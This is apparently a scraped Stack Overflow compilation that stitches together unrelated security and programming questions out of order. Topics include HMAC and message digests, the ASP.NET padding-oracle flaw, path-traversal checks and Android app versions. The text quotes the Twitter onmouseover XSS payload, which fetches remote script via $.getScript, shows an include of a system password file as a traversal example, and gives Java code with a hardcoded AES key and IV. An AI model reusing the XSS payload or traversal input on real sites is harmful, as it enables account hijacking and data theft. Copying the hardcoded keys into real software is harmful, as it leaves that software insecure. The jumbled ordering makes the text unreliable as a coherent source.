 - A message digest algorithm takes a single input -- a message -- and produces a &quot;message digest&quot; (aka hash) which allows you to verify the integrity of the message: Any change to the message will (ideally) result in a different hash being generated. An attacker that can replace the message and digest is fully capable of replacing the message and digest with a new valid pair.
 - A MAC algorithm takes two inputs -- a message and a secret key -- and produces a MAC which allows you to verify the integrity *and* the authenticity of the message: Any change to the message *or* the secret key will (ideally) result in a different MAC being generated. Nobody without access to the secret should be able to generate a MAC calculation that verifies; in other words a MAC can be used to check that the MAC was generated by a party that has access to the secret key.
 - A HMAC algorithm is simply a specific type of MAC algorithm that uses a hash algorithm internally (rather than, for example, an encryption algorithm) to generate the MAC.

 - A **Message Digest** is simply a hash of a message. It&#39;s the output of a cryptographic hash function applied to input data, which is referred to as a *message*.
 - A **Message Authentication Code** (MAC) is a piece of information that proves the integrity of a message and cannot be counterfeited easily. 
 - A **HMAC** is a specific kind of MAC defined by [RFC 2104][1].

Wikipedia has good articles covering all these terms: see [Message Digest][2], [Message Authentication Code][3], and [HMAC][4].


  [1]: http://www.ietf.org/rfc/rfc2104.txt
  [2]: http://en.wikipedia.org/wiki/Message_digest
  [3]: http://en.wikipedia.org/wiki/Message_authentication_code
  [4]: http://en.wikipedia.org/wiki/HMAC

I already have a free app in the Android Market, but I want to add a paid-for version with better features. I can&#39;t upload the same up with some changed constants to unlock those features as the Market tells me I already have an app with that package name in the market. 

What&#39;s the cleanest way of doing this?

Best way to have paid and free version of an Android app

I have a table with repeating customer rows, I would like to add the customer ID to the ID attribute of my table rows like this:

    &lt;tr id=&quot;row&lt;customer id&gt;&quot;&gt;&lt;/tr&gt;

I try adding this code:

    @foreach(var c in Model) {
       &lt;tr id=&quot;row@c.id&quot;&gt;&lt;/tr&gt;
    }

Which gives me the following output:

    &lt;tr id=&quot;row@c.id&quot;&gt;&lt;/tr&gt;
    &lt;tr id=&quot;row@c.id&quot;&gt;&lt;/tr&gt;

etc.

But I would like it to be:

    &lt;tr id=&quot;row1&quot;&gt;&lt;/tr&gt;
    &lt;tr id=&quot;row2&quot;&gt;&lt;/tr&gt;

etc.

I also tried to add `&lt;tr&gt;row@{c.id}&lt;/tr&gt;` but it did not work..

Razor syntax inside attributes of html elements (ASP MVC 3)

My understanding of a message digest is that it&#39;s an encrypted hash of some data sent along with the encrypted data so you may verify that the data has not been tampered with. What is the difference then between this and message authentication codes (MAC) and hash MACs (HMAC)?

What&#39;s the difference between Message Digest, Message Authentication Code, and HMAC?

<p>My understanding of a message digest is that it's an encrypted hash of some data sent along with the encrypted data so you may verify that the data has not been tampered with. What is the difference then between this and message authentication codes (MAC) and hash MACs (HMAC)?</p>


The jar (bcprov-jdk16-145.jar) has been added to the project, `Security.addProvider(new org.bouncycastle.jce.provider.BouncyCastleProvider())` has been added to the class, and `BouncyCastleProvider.PROVIDER_NAME` does return &quot;BC&quot; but AesFileIo.writeFile() still throws `java.security.NoSuchProviderException No such provider: BC`. Any ideas?

    import java.io.FileOutputStream;
    import java.io.InputStreamReader;
    import java.io.ObjectOutputStream;
    import javax.crypto.Cipher;
    import javax.crypto.spec.IvParameterSpec;
    import javax.crypto.spec.SecretKeySpec;
    import org.bouncycastle.jce.provider.BouncyCastleProvider;
    
    public class AesFileIo {
    
        private static final String AES_ALGORITHM = &quot;AES/CTR/NoPadding&quot;;
        private static final String PROVIDER = BouncyCastleProvider.PROVIDER_NAME;
        private static final byte[] AES_KEY_128 = { // Hard coded for now
            78, -90, 42, 70, -5, 20, -114, 103,
            -99, -25, 76, 95, -85, 94, 57, 54};
        private static final byte[] IV = { // Hard coded for now
            -85, -67, -5, 88, 28, 49, 49, 85,
            114, 83, -40, 119, -65, 91, 76, 108};
        private static final SecretKeySpec secretKeySpec =
                new SecretKeySpec(AES_KEY_128, &quot;AES&quot;);
        private static final IvParameterSpec ivSpec = new IvParameterSpec(IV);
    
        public void AesFileIo() {
            Security.addProvider(new org.bouncycastle.jce.provider
                    .BouncyCastleProvider());
        }
        
        public void writeFile(String fileName, String theFile) {
            try {
                Cipher cipher = Cipher.getInstance(AES_ALGORITHM, PROVIDER);
                cipher.init(Cipher.ENCRYPT_MODE, secretKeySpec, ivSpec);
                byte[] encrypted = cipher.doFinal(theFile.getBytes());
                ObjectOutputStream os = new ObjectOutputStream(
                    new FileOutputStream(fileName));
                os.write(encrypted);
                os.flush();
                os.close();
            } catch (Exception e) {
                StackTraceElement se = new Exception().getStackTrace()[0];
                System.err.println(se.getFileName() + &quot; &quot; + se.getLineNumber()
                        + &quot; &quot; + e);
            }
        }
    }



Why java.security.NoSuchProviderException No such provider: BC?

Would be a good or bad idea to use localStorage for sensitive data (assuming the current HTML5 implementations)?

What methods can I use to secure the data so that it cannot be read by a person that has access at the client computer?

HTML5 localStorage security

I&#39;ve just read on the net about a newly discovered security vulnerability in ASP.NET. [You can read the details here.][1]

&gt; The problem lies in the way that
&gt; ASP.NET implements the AES encryption
&gt; algorithm to protect the integrity of
&gt; the cookies these applications
&gt; generate to store information during
&gt; user sessions.

This is a bit vague, but here is a more frightening part:
 
&gt; The first stage of the attack takes a
&gt; few thousand requests, but once it
&gt; succeeds and the attacker gets the
&gt; secret keys, it&#39;s totally stealthy.The
&gt; cryptographic knowledge required is
&gt; very basic.

All in all, I&#39;m not familiar enough with the security/cryptograpy subject to know if this is really that serious.

So, should all ASP.NET developers fear this technique that *can own any ASP.NET website in seconds* or what?

How does this issue affect the average ASP.NET developer? Does it affect us at all?
In real life, what are the consequences of this vulnerability? And, finally: is there some workaround that prevents this vulnerability?

Thanks for your answers!


----------


EDIT: Let me summarize the responses I got
----------------------------------------

So, this is basically a &quot;padding oracle&quot; type of attack. [@Sri][2] provided a great explanation about what does this type of attack mean. [Here is a shocking video about the issue!][3]

About the seriousness of this vulnerability: Yes, it is indeed serious. *It lets the attacker to get to know the machine key of an application.* Thus, he can do some **very** unwanted things.

- In posession of the app&#39;s machine key, the attacker can decrypt authentication cookies.
- Even worse than that, he can **generate authentication cookies** with the name of any user. Thus, he can appear as anyone on the site. The application is unable to differentiate between you or the hacker who generated an authentication cookie with your name for himself.
- It also lets him to decrypt (and also generate) **session cookies**, although this is not as dangerous as the previous one.
- Not so serious: He can decrypt the encrypted ViewState of pages. (If you use ViewState to store confidental data, you shouldn&#39;t do this anyways!)
- **Quite unexpected**: With the knowledge of the machine key, the attacker **can download** any arbitrary file from your web application, even those that normally can&#39;t be downloaded! (Including **Web.Config**, etc.)

Here is a bunch of good practices I got that **don&#39;t** solve the issue but help improve the general security of a web application.

- [You can encrypt sensitive data with Protected Configuration][4]
- [Use HTTP Only cookies][5]
- Prevent DoS attacks

Now, let&#39;s focus on this issue.

- [Scott Guthrie published an entry about it on his blog][6]
- [ScottGu&#39;s FAQ blog post about the vulnerability][7]
- [ScottGu&#39;s update on the vulnerability][8]
- [Microsoft has a security advisory about it][9]
- [Understanding the vulnerability][10]
- [Additional information about the vulnerability][11]

The solution

- Enable customErrors and make a single error page to which **all errors** are redirected. Yes, **even 404s**. (ScottGu said that differentiating between 404s and 500s are essential for this attack.) Also, into your `Application_Error` or `Error.aspx` put some code that makes a random delay. (Generate a random number, and use Thread.Sleep to sleep for that long.) This will make it impossible for the attacker to decide what exactly happened on your server.
- Some people recommended switching back to 3DES. In theory, if you don&#39;t use AES, you don&#39;t encounter the security weakness in the AES implementation. As it turns out, this is **not recommended at all**.

Some other thoughts

- Seems that [not][12] [everyone][13] thinks the workaround is good enough.

Thanks to everyone who answered my question. I learned a lot about not only this issue, but web security in general. I marked @Mikael&#39;s answer as accepted, but the other answers are also very useful.


  [1]: http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310
  [2]: https://stackoverflow.com/questions/3720720/how-serious-is-this-new-asp-net-security-vulnerability-and-how-can-i-workaround-i/3721473#3721473
  [3]: http://www.youtube.com/watch?v=yghiC_U2RaM
  [4]: http://msdn.microsoft.com/en-us/library/zhhddkxy%28VS.80%29.aspx
  [5]: http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html
  [6]: http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
  [7]: http://weblogs.asp.net/scottgu/archive/2010/09/20/frequently-asked-questions-about-the-asp-net-security-vulnerability.aspx
  [8]: http://weblogs.asp.net/scottgu/archive/2010/09/24/update-on-asp-net-vulnerability.aspx
  [9]: http://www.microsoft.com/technet/security/advisory/2416728.mspx
  [10]: http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx
  [11]: http://blogs.technet.com/b/srd/archive/2010/09/20/additional-information-about-the-asp-net-vulnerability.aspx
  [12]: http://www.onpreinit.com/2010/09/aspnet-vulnerability-workaround-flawed.html
  [13]: http://blogs.microsoft.co.il/blogs/linqed/archive/2010/09/19/padding-oracle-asp-net-vulnerability-explanation.aspx

How serious is this new ASP.NET security vulnerability and how can I workaround it?

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:  

&lt;pre&gt;http://t.co/@&quot;style=&quot;font-size:999999999999px;&quot;onmouseover=&quot;$.getScript(&#39;http:\u002f\u002fis.gd\u002ffl9A7&#39;)&quot;/&lt;/pre&gt;

Is this technically an XSS attack or something else?

Here is how the Twitter home page looked like: http://www.flickr.com/photos/travelist/6832853140/


Today&#39;s XSS onmouseover exploit on twitter.com

I like to write a template system in Python, which allows to include files.

e.g.
&lt;pre&gt;
    This is a template
    You can safely include files with safe_include`othertemplate.rst`
&lt;/pre&gt;

As you know, including files might be dangerous. For example, if I use the template system in a web application which allows users to create their own templates, they might do something like

&lt;pre&gt;
I want your passwords: safe_include`/etc/password`
&lt;/pre&gt;

So therefore, I have to restrict the inclusion of files to files which are for example in a certain subdirectory (e.g. &lt;code&gt;/home/user/templates&lt;/code&gt;)

The question is now: How can I check, whether &lt;code&gt;/home/user/templates/includes/inc1.rst&lt;/code&gt; is in a subdirectory of &lt;code&gt;/home/user/templates&lt;/code&gt;?

Would the following code work and be secure?

    import os.path

    def in_directory(file, directory, allow_symlink = False):
        #make both absolute    
        directory = os.path.abspath(directory)
        file = os.path.abspath(file)

        #check whether file is a symbolic link, if yes, return false if they are not allowed
        if not allow_symlink and os.path.islink(file):
            return False

        #return true, if the common prefix of both is equal to directory
        #e.g. /a/b/c/d.rst and directory is /a/b, the common prefix is /a/b
        return os.path.commonprefix([file, directory]) == directory

As long, as `allow_symlink` is False, it should be secure, I think. Allowing symlinks of course would make it insecure if the user is able to create such links.


**UPDATE - Solution**
The code above does not work, if intermediate directories are symbolic links.
To prevent this, you have to use `realpath` instead of `abspath`.

**UPDATE:** adding a trailing / to directory to solve the problem with commonprefix() Reorx pointed out.

This also makes `allow_symlink` unnecessary as symlinks are expanded to their real destination   

    import os.path

    def in_directory(file, directory):
        #make both absolute    
        directory = os.path.join(os.path.realpath(directory), &#39;&#39;)
        file = os.path.realpath(file)

        #return true, if the common prefix of both is equal to directory
        #e.g. /a/b/c/d.rst and directory is /a/b, the common prefix is /a/b
        return os.path.commonprefix([file, directory]) == directory

How to check whether a directory is a sub directory of another directory

I am trying to make use of a REST API using C#. The API creator has provided sample libraries in PHP, Ruby and Java. I am getting hung up on one part of it where I need to generate an [`HMAC`][1].

Here&#39;s how it is done in the sample libraries they have provided.

**PHP**   

    hash_hmac(&#39;sha1&#39;, $signatureString, $secretKey, false);

**Ruby**  

    digest = OpenSSL::Digest::Digest.new(&#39;sha1&#39;)
    return OpenSSL::HMAC.hexdigest(digest, secretKey, signatureString)

**Java**

    SecretKeySpec signingKey = new SecretKeySpec(secretKey.getBytes(), HMAC_SHA1_ALGORITHM);

    Mac mac = null;
    mac = Mac.getInstance(HMAC_SHA1_ALGORITHM);
    mac.init(signingKey);

    byte[] bytes = mac.doFinal(signatureString.getBytes());

    String form = &quot;&quot;;
    for (int i = 0; i &lt; bytes.length; i++)
    {
        String str = Integer.toHexString(((int)bytes[i]) &amp; 0xff);
        if (str.length() == 1)
        {
            str = &quot;0&quot; + str;
        }

        form = form + str;
    }
    return form;

**Here&#39;s my attempt in C#. &lt;strike&gt;It is not working.&lt;/strike&gt; UPDATE:** The C# example below works just fine. I found out that the real problem was due to some cross-platform differences in newline characters in my `signatureString`.

    var enc = Encoding.ASCII;
    HMACSHA1 hmac = new HMACSHA1(enc.GetBytes(secretKey));
    hmac.Initialize();

    byte[] buffer = enc.GetBytes(signatureString);
    return BitConverter.ToString(hmac.ComputeHash(buffer)).Replace(&quot;-&quot;, &quot;&quot;).ToLower();

  [1]: http://en.wikipedia.org/wiki/HMAC


How to generate HMAC-SHA1 in C#?

I&#39;m hashing some values using HMAC-SHA1, using the following code in Java:

    public static String hmacSha1(String value, String key) {
		try {
			// Get an hmac_sha1 key from the raw key bytes
			byte[] keyBytes = key.getBytes();			
			SecretKeySpec signingKey = new SecretKeySpec(keyBytes, &quot;HmacSHA1&quot;);
			 
			// Get an hmac_sha1 Mac instance and initialize with the signing key
			Mac mac = Mac.getInstance(&quot;HmacSHA1&quot;);
			mac.init(signingKey);

			// Compute the hmac on input data bytes
			byte[] rawHmac = mac.doFinal(value.getBytes());
			
			// Convert raw bytes to Hex
			byte[] hexBytes = new Hex().encode(rawHmac);
			
			//  Covert array of Hex bytes to a String
			return new String(hexBytes, &quot;UTF-8&quot;);
		} catch (Exception e) {
			throw new RuntimeException(e);
		}
	}

`Hex()` belongs to `org.apache.commons.codec`

In PHP there&#39;s a similar function `hash_hmac(algorithm, data, key)` that I use to compare the values returned by my Java implementation.

So the first try is:

    hash_hmac(&quot;sha1&quot;, &quot;helloworld&quot;, &quot;mykey&quot;) // PHP

that returns: `74ae5a4a3d9996d5918defc2c3d475471bbf59ac`

My Java function returns `74ae5a4a3d9996d5918defc2c3d475471bbf59ac` as well.

Ok, it seems working. Then I try to use a more complex key:

    hash_hmac(&quot;sha1&quot;, &quot;helloworld&quot;, &quot;PRIE7$oG2uS-Yf17kEnUEpi5hvW/#AFo&quot;) // PHP

that returns: `e98bcc5c5be6f11dc582ae55f520d1ec4ae29f7a`

While this time my Java impl returns: `c19fccf57c613f1868dd22d586f9571cf6412cd0`


The hash returned by my PHP code is not equal to the value returned by my Java function, and I can&#39;t find out why.

Any tips?

HMAC-SHA1: How to do it properly in Java?

I am trying to create a signature using the HMAC-SHA256 algorithm and this is my code.
I am using US ASCII encoding.

    final Charset asciiCs = Charset.forName(&quot;US-ASCII&quot;);
    final Mac sha256_HMAC = Mac.getInstance(&quot;HmacSHA256&quot;);
    final SecretKeySpec secret_key = new javax.crypto.spec.SecretKeySpec(asciiCs.encode(&quot;key&quot;).array(), &quot;HmacSHA256&quot;);
    sha256_HMAC.init(secret_key);
    final byte[] mac_data = sha256_HMAC.doFinal(asciiCs.encode(&quot;The quick brown fox jumps over the lazy dog&quot;).array());
    String result = &quot;&quot;;
    for (final byte element : mac_data)
    {
        result += Integer.toString((element &amp; 0xff) + 0x100, 16).substring(1);
    }
    System.out.println(&quot;Result:[&quot; + result + &quot;]&quot;);

The result that I am getting from the above code is:

    f7bc83f430538424b13298e6aa6fb143ef4d59a14946175997479dbc2d1a3cd8

This is same as to that of shown in the wiki

    HMAC_SHA256(&quot;key&quot;, &quot;The quick brown fox jumps over the lazy dog&quot;) = 0x f7bc83f430538424b13298e6aa6fb143ef4d59a14946175997479dbc2d1a3cd8

_except_ for the `0x`.

I am looking for ideas/comments if I am doing everything right or may be I can improve my code.

HMAC-SHA256 Algorithm for signature calculation

Is there a bash script to generate a `HMAC-SHA1` hash?

I&#39;m looking for something equivalent to the following PHP code:

    hash_hmac(&quot;sha1&quot;, &quot;value&quot;, &quot;key&quot;);



HMAC-SHA1 in bash

I am trying to use the OAuth of a website, which requires the signature method to be &#39;HMAC-SHA1&#39; only.


I am wondering how to implement this in Python?


Content Type	Original Author	Original Content on Stackoverflow
Question	zer0stimulus	View Question on Stackoverflow
Solution 1 - Security	LukeH	View Answer on Stackoverflow
Solution 2 - Security	Ondrej Tucny	View Answer on Stackoverflow

What's the difference between Message Digest, Message Authentication Code, and HMAC?

Security Problem Overview

Security Solutions

Solution 1 - Security

Solution 2 - Security

Razor syntax inside attributes of html elements (ASP MVC 3)

Best way to have paid and free version of an Android app

Attributions